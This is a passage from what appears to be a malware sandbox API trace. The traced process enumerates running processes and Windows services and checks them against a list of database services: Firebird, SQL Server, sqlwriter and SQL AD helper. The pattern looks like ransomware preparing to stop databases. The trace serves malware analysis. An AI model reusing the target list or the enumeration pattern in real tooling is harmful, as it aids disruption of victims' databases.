lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0153.818] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0153.819] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0153.819] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0153.819] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0153.819] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0153.819] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0153.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fb7b0 | out: hHeap=0x6a0000) returned 1 [0153.819] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x29c [0153.822] Process32FirstW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.823] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0153.823] lstrlenW (lpString="System") returned 6 [0153.823] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.824] lstrlenW (lpString="smss.exe") returned 8 [0153.824] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.824] lstrlenW (lpString="csrss.exe") returned 9 [0153.825] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.825] lstrlenW (lpString="wininit.exe") returned 11 [0153.825] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.826] lstrlenW (lpString="csrss.exe") returned 9 [0153.826] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.826] lstrlenW (lpString="winlogon.exe") returned 12 [0153.826] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.827] lstrlenW (lpString="services.exe") returned 12 [0153.827] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0153.827] lstrlenW (lpString="lsass.exe") returned 9 [0153.827] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0153.828] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0153.828] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0153.828] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0153.828] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.829] lstrlenW (lpString="svchost.exe") returned 11 [0153.829] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.830] lstrlenW (lpString="svchost.exe") returned 11 [0153.830] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0153.830] lstrlenW (lpString="dwm.exe") returned 7 [0153.830] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.831] lstrlenW (lpString="svchost.exe") returned 11 [0153.831] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.831] lstrlenW (lpString="svchost.exe") returned 11 [0153.831] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.832] lstrlenW (lpString="svchost.exe") returned 11 [0153.832] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.833] lstrlenW (lpString="svchost.exe") returned 11 [0153.833] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.833] lstrlenW (lpString="svchost.exe") returned 11 [0153.833] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.834] lstrlenW (lpString="svchost.exe") returned 11 [0153.834] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.834] lstrlenW (lpString="svchost.exe") returned 11 [0153.834] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.835] lstrlenW (lpString="svchost.exe") returned 11 [0153.835] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.835] lstrlenW (lpString="svchost.exe") returned 11 [0153.835] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.836] lstrlenW (lpString="svchost.exe") returned 11 [0153.836] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0153.837] lstrlenW (lpString="spoolsv.exe") returned 11 [0153.837] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.837] lstrlenW (lpString="svchost.exe") returned 11 [0153.837] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0153.838] lstrlenW (lpString="audiodg.exe") returned 11 [0153.838] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0153.839] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0153.839] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0153.839] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0153.839] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0153.840] lstrlenW (lpString="Memory Compression") returned 18 [0153.840] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0153.840] lstrlenW (lpString="sihost.exe") returned 10 [0153.840] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.841] lstrlenW (lpString="svchost.exe") returned 11 [0153.841] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0153.841] lstrlenW (lpString="msoia.exe") returned 9 [0153.841] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0153.842] lstrlenW (lpString="taskhostw.exe") returned 13 [0153.842] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0153.842] lstrlenW (lpString="explorer.exe") returned 12 [0153.842] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0153.843] lstrlenW (lpString="SearchUI.exe") returned 12 [0153.843] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0153.843] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0153.843] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0153.844] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0153.844] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0153.845] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0153.845] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0153.845] lstrlenW (lpString="mobsync.exe") returned 11 [0153.845] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0153.846] lstrlenW (lpString="hgaibc.exe") returned 10 [0153.846] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0153.847] lstrlenW (lpString="hgaibc.exe") returned 10 [0153.847] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0153.847] lstrlenW (lpString="cmd.exe") returned 7 [0153.847] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0153.848] lstrlenW (lpString="conhost.exe") returned 11 [0153.848] Process32NextW (in: hSnapshot=0x29c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0153.848] CloseHandle (hObject=0x29c) returned 1 [0153.848] Sleep (dwMilliseconds=0x1f4) [0154.576] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6dd9f8 [0154.576] EnumServicesStatusExW (in: hSCManager=0x6dd9f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0154.577] GetLastError () returned 0xea [0154.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1bc4) returned 0x71c3f0 [0154.577] EnumServicesStatusExW (in: hSCManager=0x6dd9f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x71c3f0, cbBufSize=0x1bc4, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x71c3f0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0154.578] CloseServiceHandle (hSCObject=0x6dd9f8) returned 1 [0154.579] lstrlenW (lpString="AppXSvc") returned 7 [0154.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0154.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0154.580] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0154.580] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0154.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0154.580] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0154.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0154.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0154.580] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0154.581] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0154.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0154.581] lstrlenW (lpString="Audiosrv") returned 8 [0154.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0154.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0154.582] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0154.582] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0154.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0154.582] lstrlenW (lpString="BFE") returned 3 [0154.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0154.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0154.582] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0154.582] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0154.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0154.582] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0154.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0154.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0154.582] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0154.582] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0154.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0154.583] lstrlenW (lpString="CDPSvc") returned 6 [0154.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0154.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0154.583] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0154.583] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0154.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0154.583] lstrlenW (lpString="ClickToRunSvc") returned 13 [0154.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0154.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0154.583] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0154.583] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0154.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0154.583] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0154.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0154.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0154.584] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0154.584] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0154.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0154.584] lstrlenW (lpString="CryptSvc") returned 8 [0154.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0154.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0154.584] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0154.584] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0154.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0154.584] lstrlenW (lpString="DcomLaunch") returned 10 [0154.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0154.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0154.584] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0154.584] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0154.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0154.585] lstrlenW (lpString="DeviceAssociationService") returned 24 [0154.585] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0154.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0154.585] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0154.585] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0154.585] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0154.585] lstrlenW (lpString="Dhcp") returned 4 [0154.585] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0154.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0154.585] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0154.585] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0154.585] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0154.585] lstrlenW (lpString="Dnscache") returned 8 [0154.585] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0154.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0154.585] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0154.586] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0154.586] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0154.586] lstrlenW (lpString="DPS") returned 3 [0154.586] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0154.586] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0154.586] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0154.586] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0154.586] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0154.586] lstrlenW (lpString="DusmSvc") returned 7 [0154.586] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0154.586] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0154.586] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0154.586] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0154.586] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0154.586] lstrlenW (lpString="EventLog") returned 8 [0154.586] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0154.587] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0154.587] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0154.587] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0154.587] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0154.587] lstrlenW (lpString="EventSystem") returned 11 [0154.587] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0154.587] 